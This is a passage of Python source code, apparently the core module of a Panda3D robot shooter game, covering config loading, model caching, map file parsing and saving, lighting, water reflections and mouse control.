reflectionRenderTexture = None # Texture for reflection shader to read from
filters = None # Post processing filters
enableDistortionEffects = True
enableShaders = True
enablePostProcessing = True
enableShadows = True
savedUsername = "Unnamed"
reflectionEffectsNeeded = False # True if we're in a level with water
windowWidth = 800
windowHeight = 600
aspectRatio = float(windowWidth) / float(windowHeight)
isDaemon = False
cache = dict()
defaultFov = 70
shadowMapWidth = 1024
shadowMapHeight = 1024
mf = None
physicsEntityFileCache = dict()
paused = False
enablePause = False
modelFileSuffix = ""
map = None
inputEnabled = True
maps = []
def exit():
if net.context != None:
net.context.delete()
particles.ParticleGroup.end()
sys.exit()
class Logger:
def __init__(self):
self.notify = DirectNotify().newCategory("core")
def error(self, msg):
self.notify.warning(msg)
def warning(self, msg):
self.notify.warning(msg)
def info(self, msg):
self.notify.info(msg)
def debug(self, msg):
self.notify.debug(msg)
def exception(self, msg):
self.notify.error(msg)
def togglePause():
global paused
if enablePause:
paused = not paused
def loadConfigFile():
global enableDistortionEffects
global enableShaders
global enablePostProcessing
global enableShadows
global savedUsername
global windowWidth
global windowHeight
global isFullscreen
global aspectRatio
try:
configFile = open(os.path.join(os.path.expanduser("~"), "a3p-config"), "r")
except IOError:
return
lines = configFile.read().split('\n')
configFile.close()
for line in lines:
parts = line.split()
if len(parts) == 0:
continue
if parts[0] == "enable-distortion-effects":
enableDistortionEffects = parts[1] == "#t"
elif parts[0] == "enable-shaders":
enableShaders = parts[1] == "#t"
elif parts[0] == "enable-post-processing":
enablePostProcessing = parts[1] == "#t"
elif parts[0] == "enable-shadows":
enableShadows = parts[1] == "#t"
elif parts[0] == "username":
savedUsername = " ".join(parts[1:])
if windowHeight > 0:
aspectRatio = float(windowWidth) / float(windowHeight)
def saveConfigFile():
global enableDistortionEffects
global enableShaders
global enablePostProcessing
global enableShadows
global savedUsername
global windowWidth
global windowHeight
global aspectRatio
aspectRatio = float(windowWidth) / float(windowHeight)
configFile = open(os.path.join(os.path.expanduser("~"), "a3p-config"), "w")
def boolToStr(a):
if a:
return "#t"
else:
return "#f"
configFile.write("enable-distortion-effects " + boolToStr(enableDistortionEffects) + "\n")
configFile.write("enable-shaders " + boolToStr(enableShaders) + "\n")
configFile.write("enable-post-processing " + boolToStr(enablePostProcessing) + "\n")
configFile.write("enable-shadows " + boolToStr(enableShadows) + "\n")
configFile.write("username " + savedUsername)
configFile.close()
def cacheModel(filename):
global modelFileSuffix
model = loader.loadModel(filename + modelFileSuffix)
model.reparentTo(renderLit)
model.reparentTo(hidden)
cache[filename] = model
def loadModel(filename):
global modelFileSuffix
if not filename in cache:
return loader.loadModel(filename + modelFileSuffix)
else:
model = cache[filename]
node = hidden.attachNewNode(filename)
model.instanceTo(node)
return node
def loadAnimation(filename, animations):
global modelFileSuffix
for anim in animations:
animations[anim] += modelFileSuffix
a = Actor(filename + modelFileSuffix, animations)
a.setBlend(frameBlend = True)
return a
def deleteModel(node, filename):
node.removeNode()
def init(showFrameRate = False, daemon = False):
"Initializes various global components, like audio, lighting, and the clock. Should be called once at the beginning of the program."
global renderLit
global clock
global renderObjects
global renderEnvironment
global log
global reflectionBuffer
global reflectionCamera
global reflectionRenderTexture
global defaultFov
global enableShaders
global enablePostProcessing
global enableDistortionEffects
global filters
global isDaemon
global mf
global maps
mf = None
if not vfs.isDirectory("maps"):
mf = Multifile()
mf.openRead(ExecutionEnvironment.getEnvironmentVariable("PKG_ROOT") + "/pkg.mf")
isDaemon = daemon
if not daemon:
base.setBackgroundColor(2.0/255.0, 28.0/255.0, 53.0/255.0)
log = Logger()
sys.excepthook = exceptHook
clock = Clock()
base.disableMouse() # Disable default mouse camera control
if not daemon:
base.camNode.setCameraMask(BitMask32.bit(1))
base.camLens.setFov(defaultFov)
renderLit = render.attachNewNode("renderLit")
renderObjects = renderLit.attachNewNode("renderObjects")
renderEnvironment = renderLit.attachNewNode("renderEnvironment")
controllers.init()
ai.init()
audio.init(dropOffFactor = 1.4, distanceFactor = 14, dopplerFactor = 0.0)
numMaxDynamicLights = 0
if enableShaders and not daemon:
numMaxDynamicLights = 2
for i in range(numMaxDynamicLights):
light = PointLight("Light" + str(i))
light.setColor(Vec4(0, 0, 0, 1))
light.setAttenuation(Vec3(0, 0, 1))
lightNode = renderLit.attachNewNode(light)
lightNode.setPos(0, 0, 0)
renderLit.setLight(lightNode)
lightNodes.append((light, lightNode))
if enableShaders and not daemon:
shadersChanged()
if enablePostProcessing and not daemon:
postProcessingChanged()
if not daemon:
winprops = WindowProperties()
props = FrameBufferProperties()
props.setRgbColor(1)
reflectionBuffer = base.graphicsEngine.makeOutput(
base.pipe, "reflection-buffer", -2,
props, winprops,
GraphicsPipe.BFSizeTrackHost | GraphicsPipe.BFRefuseWindow,
base.win.getGsg(), base.win)
reflectionBuffer.setSort(-100)
reflectionBuffer.setClearColor(Vec4(0, 0, 0, 0))
reflectionRenderTexture = Texture()
reflectionBuffer.addRenderTexture(reflectionRenderTexture, GraphicsOutput.RTMBindOrCopy, GraphicsOutput.RTPColor)
reflectionCamera = base.makeCamera(reflectionBuffer, scene = render, lens = base.cam.node().getLens(), mask = BitMask32.bit(4))
reflectionCamera.reparentTo(render)
reflectionCamera.node().setActive(False)
particles.init()
maps = [x.split("\t") for x in readFile("maps/maps.txt").split("\n")]
def preloadModels():
global modelFileSuffix
if os.path.exists("models/basicdroid/BasicDroid.bam"):
modelFileSuffix = ".bam"
cacheModel("models/basicdroid/BasicDroid")
cacheModel("models/basicdroid/chaingun")
cacheModel("models/basicdroid/BasicDroid-lowres")
cacheModel("models/basicdroid/sniper")
cacheModel("models/basicdroid/shotgun")
cacheModel("models/basicdroid/pistol")
cacheModel("models/shield/shield")
cacheModel("models/grenade/Grenade")
cacheModel("models/fragment/Fragment")
cacheModel("models/basicdroid/claw")
cacheModel("models/basicdroid/claw-Retract")
cacheModel("models/basicdroid/claw-Impale")
cacheModel("models/fragment/GlassFragment")
cacheModel("models/spawnpoint/SpawnPoint")
cacheModel("models/spike/spike")
cacheModel("models/pod/pod")
cacheModel("maps/Block")
cacheModel("maps/block1")
cacheModel("models/crosshair/crosshair")
def postProcessingChanged():
global filters
if enablePostProcessing:
if filters == None:
filters = CommonFilters(base.win, base.cam)
render.setAttrib(LightRampAttrib.makeHdr1())
filters.setBloom(intensity = 1, size = 2)
else:
if filters != None:
filters.delBloom()
saveConfigFile()
def shadersChanged():
if enableShaders:
renderLit.setShaderAuto()
else:
renderLit.clearShader()
saveConfigFile()
def shadowsChanged():
global map
if map != None:
if enableShadows:
map.enableShadows()
else:
map.disableShadows()
saveConfigFile()
def distortionEffectsChanged():
if reflectionCamera != None:
reflectionCamera.node().setActive(enableDistortionEffects and reflectionEffectsNeeded)
saveConfigFile()
def exceptHook(type, value, trace):
sys.exc_info = lambda: (type, value, trace) # logging uses sys.exc_info to get exception data.
exceptionData = traceback.format_exc()
log.info(exceptionData)
print exceptionData
def clearLights():
global lights
for light in lights:
light.remove()
del lights[:]
def update():
"Updates global components. Basically the clock. Should be called once every frame, regardless of the game state."
if not paused:
clock.update()
else:
clock.timeStep = 0
particles.ParticleGroup.begin()
particles.update(not paused)
def endUpdate():
particles.ParticleGroup.end()
class Clock:
"""Global clock; used just about everywhere.
Starts at 0, units are in seconds.
You can also change how fast it increments (slow down or speed up time).
A new clock should be initialized every time a new Game is created."""
def __init__(self):
if sys.platform == "win32":
self.timerFunction = time.clock
else:
self.timerFunction = time.time
self._time = self.timerFunction()
self.timeStep = 0
self.lastFrameTime = self.time
def update(self):
"Call once every frame."
self.lastFrameTime = self.time
self._time = self.timerFunction()
self.timeStep = min(0.1, max(0.005, self.time - self.lastFrameTime))
@property
def time(self):
return self._time
def readFile(file):
data = ""
if vfs.exists(file):
data = vfs.readFile(file, 1)
elif mf != None: # We're reading from a multifile
fileId = mf.findSubfile(file)
data = mf.readSubfile(fileId)
return data
def readPhysicsEntityFile(file):
global physicsEntityFileCache
if file in physicsEntityFileCache:
data = physicsEntityFileCache[file]
else:
data = readFile("maps/" + file)
physicsEntityFileCache[file] = data
return data
class Map(DirectObject):
"""A Map loads all environment resources from a map file.
Maps also keep track of the custom lights, skybox textures, sounds, etc, and can save this data back to a map file."""
def __init__(self):
global map
map = self
self.skyBox = None
self.skyBoxFilename = ""
self.sceneries = dict()
self.staticGeometries = dict()
self.worldSize = 0
self.lights = []
self.waterNode = None
self.waterPlane = None
self.waterPlaneNode = None
self.waterPlaneNodePath = None
self.mapDirectory = "maps"
self.isSurvival = False
self.ambientSound = None
self.platforms = []
self.name = ""
def addSoundGroup(self, soundGroup):
self.soundGroups[soundGroup.name] = soundGroup;
def addStaticGeometry(self, geom):
if not geom.node in self.staticGeometries:
self.staticGeometries[geom.node] = geom
def deleteStaticGeometry(self, geom):
geom.node.removeNode()
geom.geometry.destroy()
if geom.node in self.staticGeometries:
del self.staticGeometries[geom.node]
def showPlatforms(self):
for p in self.platforms:
p.show()
def hidePlatforms(self):
for p in self.platforms:
p.hide()
def disableShadows(self):
for light in self.lights:
if isinstance(light.getNode(0), Spotlight) and light.node().isShadowCaster():
light.node().setShadowCaster(False)
def enableShadows(self):
for light in self.lights:
if light.getTag("shadow") == "true":
light.node().setShadowCaster(True, shadowMapWidth, shadowMapHeight)
def load(self, name, aiWorld, entityGroup):
"Loads the specified map file, creating all resources, and filling out the AI world and entity group."
global cubeMap
global reflectionEffectsNeeded
self.name = name
self.filename = "maps/" + self.name + ".txt"
mapDirectory = "maps"
data = readFile(self.filename)
lines = data.split('\n')
for line in lines:
tokens = line.split()
if len(tokens) == 0 or line[0] == "#":
continue
if tokens[0] == "world":
self.worldSize = float(tokens[1])
elif tokens[0] == "teams":
numTeams = sum([int(token) for token in tokens[1:]])
if net.netMode == net.MODE_SERVER:
if len(tokens) > 2: # 2v2
colors = [Vec4(0.7, 0.0, 0.0, 1), Vec4(0.0, 0.0, 0.7, 1), Vec4(0.2, 0.0, 0.0, 1), Vec4(0.0, 0.0, 0.2, 1)]
else: # Free-for-all up to 4 players
colors = [Vec4(0.5, 0.0, 0.0, 1), Vec4(0.0, 0.0, 0.5, 1), Vec4(0, 0.5, 0, 1), Vec4(0.5, 0.5, 0, 1)]
for i in range(numTeams):
team = entities.TeamEntity()
team.color = colors[i]
docks = [x for x in aiWorld.docks if x.teamIndex == i]
if len(docks) > 0:
team.setDock(docks[0])
entityGroup.spawnEntity(team)
entityGroup.addTeam(team)
if len(tokens) > 2: # x vs. y
# Set up allies. First team is allied with even teams, second team with odd.
i = 2
while i < len(entityGroup.teams):
entityGroup.teams[0].addAlly(entityGroup.teams[i].getId())
i += 2
i = 3
while i < len(entityGroup.teams):
entityGroup.teams[1].addAlly(entityGroup.teams[i].getId())
i += 2
elif tokens[0] == "navmesh":
aiWorld.navMesh = ai.NavMesh(mapDirectory, tokens[1])
elif tokens[0] == "survival":
self.isSurvival = True
numTeams = 4
if net.netMode == net.MODE_SERVER:
colors = [Vec4(0.4, 0.0, 0.0, 1), Vec4(0.0, 0.0, 0.4, 1), Vec4(0, 0.4, 0, 1), Vec4(0.4, 0.4, 0, 1)]
for i in range(4):
team = entities.TeamEntity()
team.money = 300 # Starting money amount for survival
team.color = colors[i]
team.isSurvivors = True
entityGroup.spawnEntity(team)
entityGroup.addTeam(team)
for team in entityGroup.teams:
for team2 in entityGroup.teams:
team.addAlly(team2.getId())
elif tokens[0] == "glass":
if net.netMode == net.MODE_SERVER:
# Glass pane
glass = entities.Glass(aiWorld.world, aiWorld.space)
glass.initGlass(aiWorld.world, aiWorld.space, float(tokens[1]), float(tokens[2]))
glass.setPosition(Vec3(float(tokens[3]), float(tokens[4]), float(tokens[5])))
glass.setPosition(glass.getPosition())
glass.setRotation(Vec3(float(tokens[6]), float(tokens[7]), float(tokens[8])))
entityGroup.spawnEntity(glass)
elif tokens[0] == "water":
# Enable reflection rendering
reflectionEffectsNeeded = True
distortionEffectsChanged()
maker = CardMaker("waterNode")
maker.setFrame(-self.worldSize, self.worldSize, -self.worldSize, self.worldSize)
self.waterNode = render.attachNewNode(maker.generate())
self.waterNode.setHpr(0, -90, 0)
self.waterNode.setPos(0, 0, float(tokens[1])) # Second token is water height
self.waterNode.setShader(loader.loadShader("images/water.sha"))
self.waterNode.setTransparency(TransparencyAttrib.MAlpha)
self.waterNode.setShaderInput("watermap", loader.loadTexture("images/water-normal.jpg"))
self.waterNode.setShaderInput("time", clock.time)
self.waterNode.hide(BitMask32.bit(4))
self.waterPlane = Plane(Vec3(0, 0, 1), Point3(0, 0, float(tokens[1])))
self.waterPlaneNode = PlaneNode("waterPlaneNode")
self.waterPlaneNode.setPlane(self.waterPlane)
self.waterPlaneNodePath = render.attachNewNode(self.waterPlaneNode)
self.waterPlaneNodePath.hide()
clipPlaneAttrib = ClipPlaneAttrib.make()
clipPlaneAttrib = clipPlaneAttrib.addOnPlane(self.waterPlaneNodePath)
if reflectionCamera != None:
self.waterNode.setShaderInput("reflectionscreen", reflectionRenderTexture)
reflectionCamera.node().setInitialState(RenderState.make(CullFaceAttrib.makeReverse(), clipPlaneAttrib))
elif tokens[0] == "geometry":
# Setup static geometry
geom = StaticGeometry(aiWorld.space, mapDirectory, tokens[1])
geom.setPosition(Vec3(float(tokens[2]), float(tokens[3]), float(tokens[4])))
geom.commitChanges()
self.addStaticGeometry(geom)
elif tokens[0] == "geometry-scenery":
# Setup static geometry
geom = StaticGeometry(aiWorld.space, mapDirectory, tokens[1])
geom.setPosition(Vec3(float(tokens[2]), float(tokens[3]), float(tokens[4])))
geom.commitChanges()
geom.node.show()
self.addStaticGeometry(geom)
elif tokens[0] == "skybox":
if not isDaemon:
self.skyBox = loadModel("models/skyboxes/" + tokens[1])
self.skyBox.setScale(self.worldSize)
self.skyBoxCustomModel = True
self.skyBoxFilename = tokens[1]
self.skyBox.setPos(camera.getPos(render))
self.skyBox.setBin('background', 0)
self.skyBox.setDepthWrite(0)
self.skyBox.setDepthTest(0)
self.skyBox.setClipPlaneOff()
self.skyBox.setTwoSided(True)
self.skyBox.setShaderOff()
self.skyBox.reparentTo(render)
elif tokens[0] == "sound":
if not isDaemon:
self.ambientSound = audio.FlatSound(mapDirectory + "/" + tokens[1], float(tokens[2]))
self.ambientSound.setLoop(True)
self.ambientSound.play()
elif tokens[0] == "light":
if tokens[1] == "objects":
parentNode = renderObjects
elif tokens[1] == "environment":
parentNode = renderEnvironment
else:
parentNode = renderLit
if tokens[2] == "directional":
light = Spotlight(tokens[3])
lens = PerspectiveLens()
lens.setFov(45)
light.setExponent(0)
light.setLens(lens)
light.setColor(Vec4(float(tokens[4]), float(tokens[5]), float(tokens[6]), 1))
lightNode = parentNode.attachNewNode(light)
lightNode.setTag("type", "directional") # We can look this up later when we go to save, to differentiate between spotlights and directionals
lightNode.setHpr(float(tokens[7]), float(tokens[8]), float(tokens[9]))
lightNode.setPos(render.getRelativeVector(lightNode, Vec3(0, 1, 0)) * -self.worldSize * 2.25)
if len(tokens) >= 11 and tokens[10] == "shadow" and hasattr(light, "setShadowCaster"):
lightNode.setTag("shadow", "true")
if enableShadows:
light.setShadowCaster(True, shadowMapWidth, shadowMapHeight)
light.setCameraMask(BitMask32.bit(4))
else:
lightNode.setTag("shadow", "false")
parentNode.setLight(lightNode)
self.lights.append(lightNode)
elif tokens[2] == "ambient":
light = AmbientLight(tokens[3])
light.setColor(Vec4(float(tokens[4]), float(tokens[5]), float(tokens[6]), 1))
lightNode = parentNode.attachNewNode(light)
parentNode.setLight(lightNode)
self.lights.append(lightNode)
elif tokens[2] == "point":
light = PointLight(tokens[3])
light.setColor(Vec4(float(tokens[7]), float(tokens[8]), float(tokens[9]), 1))
light.setAttenuation(Vec3(float(tokens[10]), float(tokens[11]), float(tokens[12])))
lightNode = parentNode.attachNewNode(light)
lightNode.setPos(float(tokens[4]), float(tokens[5]), float(tokens[6]))
parentNode.setLight(lightNode)
self.lights.append(lightNode)
elif tokens[2] == "spot":
light = Spotlight(tokens[3])
lens = PerspectiveLens()
lens.setFov(float(tokens[16]))
light.setExponent(float(tokens[17]))
light.setLens(lens)
light.setColor(Vec4(float(tokens[10]), float(tokens[11]), float(tokens[12]), 1))
light.setAttenuation(Vec3(float(tokens[13]), float(tokens[14]), float(tokens[15])))
lightNode = parentNode.attachNewNode(light)
lightNode.setPos(float(tokens[4]), float(tokens[5]), float(tokens[6]))
lightNode.setHpr(float(tokens[7]), float(tokens[8]), float(tokens[9]))
if hasattr(light, "setShadowCaster") and len(tokens) >= 19 and tokens[18] == "shadow":
light.setShadowCaster(True, 2048, 2048)
light.setCameraMask(BitMask32.bit(4))
parentNode.setLight(lightNode)
lightNode.setTag("type", "spot") # We can look this up later when we go to save, to differentiate between spotlights and directionals
self.lights.append(lightNode)
elif tokens[0] == "dock":
dock = Dock(aiWorld.space, int(tokens[1]))
pos = Vec3(float(tokens[2]), float(tokens[3]), float(tokens[4]))
dock.setPosition(pos)
normal = Vec3(0, 0, 1)
queue = aiWorld.getCollisionQueue(Vec3(pos.getX(), pos.getY(), pos.getZ()), Vec3(0, 0, -1))
for i in range(queue.getNumEntries()):
entry = queue.getEntry(i)
if entityGroup.getEntityFromEntry(entry) != None:
continue
normal = entry.getSurfaceNormal(render)
break
dock.setRotation(Vec3(0, math.degrees(-math.atan2(normal.getY(), normal.getZ())), math.degrees(math.atan2(normal.getX(), normal.getZ()))))
aiWorld.docks.append(dock)
elif tokens[0] == "physicsentity":
if net.netMode == net.MODE_SERVER:
file = tokens[1] + ".txt"
data = readPhysicsEntityFile(file)
parts = tokens[1].rpartition("/")
directory = mapDirectory + "/" + parts[0]
obj = entities.PhysicsEntity(aiWorld.world, aiWorld.space, data, directory, tokens[1])
obj.setPosition(Vec3(float(tokens[2]), float(tokens[3]), float(tokens[4])))
obj.setRotation(Vec3(float(tokens[5]), float(tokens[6]), float(tokens[7])))
obj.controller.commitLastPosition()
entityGroup.spawnEntity(obj)
elif tokens[0] == "spawnpoint":
# Setup spawn point
geom = SpawnPoint(aiWorld.space)
geom.setPosition(Vec3(float(tokens[1]), float(tokens[2]), float(tokens[3])))
geom.setRotation(Vec3(float(tokens[4]), float(tokens[5]), float(tokens[6])))
aiWorld.spawnPoints.append(geom)
elif tokens[0] == "scenery":
scenery = loadModel(mapDirectory + "/" + tokens[1])
scenery.setPos(float(tokens[2]), float(tokens[3]), float(tokens[4]))
scenery.reparentTo(renderLit)
self.sceneries[tokens[1]] = scenery
# Create winnar platforms
entry = aiWorld.getFirstCollision(Vec3(0, 0, 100), Vec3(0, 0, -1))
height = 15
if entry != None:
height = entry.getSurfacePoint(render).getZ() + 10.0
for i in range(numTeams):
p = Platform(aiWorld.space)
spacing = 7
vspacing = 2
offset = spacing / -2 if numTeams % 2 == 0 else 0
p.setPosition(Vec3((math.ceil(i / 2.0) * (((i % 2) * 2) - 1) * spacing) + offset, 0, height + (numTeams - 1 - i) * vspacing))
p.commitChanges()
p.hide()
self.platforms.append(p)
def save(self, aiWorld, entityGroup):
"Saves a basic representation of the current game state (including environment resources) to a map file."
class MapFile:
def __init__(self):
self.data = ""
def write(self, line):
self.data += line
mapFile = MapFile()
mapFile.write("world " + str(self.worldSize) + "\n")
if aiWorld.navMesh != None:
mapFile.write("navmesh " + aiWorld.navMesh.filename + "\n")
index = 0
for dock in aiWorld.docks:
if dock.active:
pos = dock.getPosition()
mapFile.write("dock " + str(index) + " " + str(pos.getX()) + " " + str(pos.getY()) + " " + str(pos.getZ()) + "\n")
index += 1
if self.isSurvival:
mapFile.write("survival\n")
else:
if len(entityGroup.teams[0].getAllies()) > 0:
mapFile.write("teams " + str(len(entityGroup.teams[0].getAllies()) + 1) + " " + str(len(entityGroup.teams[1].getAllies()) + 1) + "\n")
else:
mapFile.write("teams " + str(len(entityGroup.teams)) + "\n")
for geom in self.staticGeometries.values():
pos = geom.getPosition()
keyword = "geometry"
if not geom.node.isHidden():
keyword = "geometry-scenery"
mapFile.write(keyword + " " + geom.filename + " " + str(pos.getX()) + " " + str(pos.getY()) + " " + str(pos.getZ()) + "\n")
if self.skyBox != None:
mapFile.write("skybox " + self.skyBoxFilename + "\n")
if self.ambientSound != None:
mapFile.write("sound " + self.ambientSound.filename.replace(self.mapDirectory + "/", "") + " " + str(self.ambientSound.getVolume()) + "\n")
if self.waterNode != None:
mapFile.write("water " + str(self.waterNode.getZ()) + "\n")
for light in self.lights:
color = light.getNode(0).getColor()
mapFile.write("light ")
if light.getNode(0).getParent(0) == renderObjects:
mapFile.write("objects ")
elif light.getNode(0).getParent(0) == renderEnvironment:
mapFile.write("environment ")
else:
mapFile.write("all ")
if isinstance(light.getNode(0), AmbientLight):
mapFile.write("ambient " + light.getName() + " " + str(color.getX()) + " " + str(color.getY()) + " " + str(color.getZ()) + "\n")
elif isinstance(light.getNode(0), Spotlight):
# Could be a real spotlight, or it could be a directional light, since we fake those.
if light.getTag("type") == "directional":
mapFile.write("directional " + light.getName() + " " + str(color.getX()) + " " + str(color.getY()) + " " + str(color.getZ()) + " " + str(light.getH()) + " " + str(light.getP()) + " " + str(light.getR()) + (" shadow" if light.node().isShadowCaster() else "") + "\n")
else:
pos = light.getPos(render)
atten = light.getNode(0).getAttenuation()
fov = light.getNode(0).getLens().getFov()
exponent = light.getNode(0).getExponent()
mapFile.write("spot " + light.getName() + " " + " " + str(pos.getX()) + " " + str(pos.getY()) + " " + str(pos.getZ()) + " " + str(light.getH()) + " " + str(light.getP()) + " " + str(light.getR()) + " " + str(color.getX()) + " " + str(color.getY()) + " " + str(color.getZ()) + " " + str(atten.getX()) + " " + str(atten.getY()) + " " + str(atten.getZ()) + " " + str(fov) + " " + str(exponent) + " " + (" shadow" if light.getTag("shadow") == "true" else "") + "\n")
elif isinstance(light.getNode(0), PointLight):
atten = light.getNode(0).getAttenuation()
pos = light.getPos(render)
mapFile.write("point " + light.getName() + " " + str(pos.getX()) + " " + str(pos.getY()) + " " + str(pos.getZ()) + " " + str(color.getX()) + " " + str(color.getY()) + " " + str(color.getZ()) + " " + str(atten.getX()) + " " + str(atten.getY()) + " " + str(atten.getZ()) + "\n")
for sceneryFile in self.sceneries.keys():
pos = self.sceneries[sceneryFile].getPos(render)
mapFile.write("scenery " + sceneryFile + " " + str(pos.getX()) + " " + str(pos.getY()) + " " + str(pos.getZ()) + "\n")
for obj in (entity for entity in entityGroup.entities.values() if isinstance(entity, entities.PhysicsEntity)):
pos = obj.getPosition()
hpr = obj.node.getHpr()
mapFile.write("physicsentity " + obj.dataFile + " " + str(pos.getX()) + " " + str(pos.getY()) + " " + str(pos.getZ()) + " " + str(hpr.getX()) + " " + str(hpr.getY()) + " " + str(hpr.getZ()) + "\n")
for glass in (entity for entity in entityGroup.entities.values() if isinstance(entity, entities.Glass)):
pos = glass.getPosition()
hpr = glass.getRotation()
mapFile.write("glass " + str(glass.glassWidth) + " " + str(glass.glassHeight) + " " + str(pos.getX()) + " " + str(pos.getY()) + " " + str(pos.getZ()) + " " + str(hpr.getX()) + " " + str(hpr.getY()) + " " + str(hpr.getZ()) + "\n")
for point in aiWorld.spawnPoints:
if point.active:
pos = point.getPosition()
rot = point.getRotation()
mapFile.write("spawnpoint " + str(pos.getX()) + " " + str(pos.getY()) + " " + str(pos.getZ()) + " " + str(rot.getX()) + " " + str(rot.getY()) + " " + str(rot.getZ()) + "\n")
stream = open(self.filename, "w")
stream.write(mapFile.data)
stream.close()
def update(self):
"Updates the custom sounds and the skybox associated with this Map."
if self.skyBox != None:
camPos = camera.getPos(render)
self.skyBox.setPos(camPos - Vec3(0, 0, 25))
if self.waterNode != None:
self.waterNode.setShaderInput("time", clock.time)
if reflectionCamera != None:
reflectionCamera.setMat(base.camera.getMat() * self.waterPlane.getReflectionMat())
def delete(self):
"Releases all resources, including scenery, physics geometries, and environment sounds and lights."
global map
map = None
if self.skyBox != None:
self.skyBox.removeNode()
for scenery in self.sceneries.values():
scenery.removeNode()
self.sceneries.clear()
for geom in self.staticGeometries.values():
self.deleteStaticGeometry(geom)
self.staticGeometries.clear()
for p in self.platforms:
p.delete()
del self.platforms[:]
for light in self.lights:
light.getParent().clearLight(light)
light.removeNode()
if self.waterNode != None:
self.waterNode.removeNode()
del self.lights[:]
if reflectionCamera != None:
reflectionCamera.node().setActive(False)
if self.ambientSound != None:
self.ambientSound.stop()
del self.ambientSound
class StaticGeometry(DirectObject):
"A StaticGeometry is a potentially invisible, immovable physics object, modeled as a trimesh."
def __init__(self, space, directory, filename=None):
assert filename != None
self.filename = filename
self.node = loadModel(directory + "/" + self.filename)
self.node.reparentTo(renderEnvironment)
self.node.hide()
self.node.setCollideMask(BitMask32(1))
triMeshData = OdeTriMeshData(self.node, True)
self.geometry = OdeTriMeshGeom(space, triMeshData)
self.geometry.setCollideBits(BitMask32(0x00000001))
self.geometry.setCategoryBits(BitMask32(0x00000001))
space.setSurfaceType(self.geometry, 0)
def setPosition(self, pos):
self.geometry.setPosition(pos)
self.node.setPos(pos)
def getPosition(self):
return self.geometry.getPosition()
def setRotation(self, hpr):
self.node.setHpr(hpr)
self.geometry.setQuat(self.node.getQuat(render))
def getRotation(self):
return self.node.getHpr()
def commitChanges(self):
"Updates the NodePath to reflect the position of the ODE geometry."
self.node.setPosQuat(renderEnvironment, self.getPosition(), Quat(self.geometry.getQuaternion()))
class SpawnPoint(DirectObject):
"Marks a location for units to spawn."
def __init__(self, space):
self.node = loadModel("models/spawnpoint/SpawnPoint")
self.node.reparentTo(renderEnvironment)
self.active = True
def setPosition(self, pos):
self.node.setPos(pos)
def getPosition(self):
return self.node.getPos()
def setRotation(self, hpr):
self.node.setHpr(hpr)
def getRotation(self):
return self.node.getHpr()
def delete(self):
self.active = False
deleteModel(self.node, "models/spawnpoint/SpawnPoint")
class Dock(SpawnPoint):
"Docks have a one-to-one relationship with Teams. Their Controllers increment the team's money and spawn newly purchased units."
def __init__(self, space, teamIndex):
self.teamIndex = teamIndex
self.active = True
self.radius = 6
self.vradius = 2
self.node = loadModel("models/dock/Dock")
self.node.reparentTo(renderEnvironment)
self.shieldNode = loadModel("models/shield/shield")
self.shieldNode.reparentTo(self.node)
self.shieldNode.setScale(self.radius)
self.shieldNode.setTwoSided(True)
self.shieldNode.setShaderOff(True)
self.shieldNode.setColor(0.8, 0.9, 1.0, 0.6)
self.shieldNode.setTransparency(TransparencyAttrib.MAlpha)
self.shieldNode.hide(BitMask32.bit(4)) # Don't cast shadows
def setPosition(self, pos):
self.node.setPos(pos - Vec3(0, 0, self.vradius))
def getPosition(self):
return self.node.getPos() + Vec3(0, 0, self.vradius)
class Platform(DirectObject):
"Makes a platform upon which to parade the game winners."
def __init__(self, space):
self.node = loadModel("maps/platform")
self.node.reparentTo(renderEnvironment)
self.collisionNode = CollisionNode("cnode")
self.collisionNode.addSolid(CollisionSphere(0, 0, 0, 5))
self.collisionNodePath = self.node.attachNewNode(self.collisionNode)
self.collisionNode.setCollideMask(BitMask32(1))
odeCollisionNode = loadModel("maps/platform-geometry")
triMeshData = OdeTriMeshData(odeCollisionNode, True)
self.geometry = OdeTriMeshGeom(space, triMeshData)
self.geometry.setCollideBits(BitMask32(0x00000001))
self.geometry.setCategoryBits(BitMask32(0x00000001))
space.setSurfaceType(self.geometry, 0)
def setPosition(self, pos):
self.geometry.setPosition(pos)
self.node.setPos(pos)
def getPosition(self):
return self.geometry.getPosition()
def setRotation(self, hpr):
self.node.setHpr(hpr)
self.geometry.setQuaternion(self.node.getQuat(render))
def getRotation(self):
return self.node.getHpr()
def show(self):
self.geometry.enable()
self.node.reparentTo(renderEnvironment)
def hide(self):
self.geometry.disable()
self.node.reparentTo(hidden)
def delete(self):
deleteModel(self.node, "models/spawnpoint/SpawnPoint")
self.geometry.destroy()
def commitChanges(self):
"Updates the NodePath to reflect the position of the ODE geometry."
self.node.setPosQuat(renderEnvironment, self.getPosition(), Quat(self.geometry.getQuaternion()))
class Mouse:
"""A mouse can be created by any object that needs it (usually a controller).
However, there should only be one mouse active at a time, since each Mouse object will recenter the cursor every frame."""
enabled = True
def __init__(self):
base.disableMouse()
self._lastX = base.win.getProperties().getXSize() / 2
self._lastY = base.win.getProperties().getYSize() / 2
self._x = 0
self._y = 0
self.baseSpeed = 0.001
self.speed = 1
self._dx = 0
self._dy = 0
self._maxY = math.pi * 0.5
self._minY = -self._maxY
self.lastUpdate = 0
def setYLimit(self, maxY, minY):
self._maxY = maxY
self._minY = minY
def setSpeed(self, speed):
"Sets the sensitivity of the mouse."
self.speed = speed
def update(self):
"Updates the mouse's position and speed, then recenters the cursor in the window."
if not Mouse.enabled:
return
self.lastUpdate = clock.time
pointer = base.win.getPointer(0)
mouseX = pointer.getX()
mouseY = pointer.getY()
self._dx = (mouseX - self._lastX) * self.baseSpeed * self.speed
self._dy = -(mouseY - self._lastY) * self.baseSpeed * self.speed
self._lastX = mouseX
self._lastY = mouseY
self._x += self._dx
self._y = min(self._maxY, max(self._minY, self._y + self._dy))
centerX = base.win.getProperties().getXSize() / 2
centerY = base.win.getProperties().getYSize() / 2
if base.win.movePointer(0, centerX, centerY):
self._lastX = centerX
self._lastY = centerY
def setX(self, x):
self._x = x
def setY(self, y):
self._y = y
def getX(self):
return self._x
def getDX(self):
return self._dx
def getDY(self):
return self._dy
def getY(self):
return self._y
@staticmethod
def showCursor():
Mouse.enabled = False
props = WindowProperties()
props.setCursorHidden(False)
base.win.requestProperties(props)
@staticmethod
def hideCursor():
Mouse.enabled = True
props = WindowProperties()
props.setCursorHidden(True)
base.win.requestProperties(props)
base.win.movePointer(0, base.win.getProperties().getXSize() / 2, base.win.getProperties().getYSize() / 2)
class Light:
"""At this time, only point lights are supported. Really though, what do you need a spotlight for?
This class is necessary because every time a Panda3D light is added, all shaders must be regenerated.
